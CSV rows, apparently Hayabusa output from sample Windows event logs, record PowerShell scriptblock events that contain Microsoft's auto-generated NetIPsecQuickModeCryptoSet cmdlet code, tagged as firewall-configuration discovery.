$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 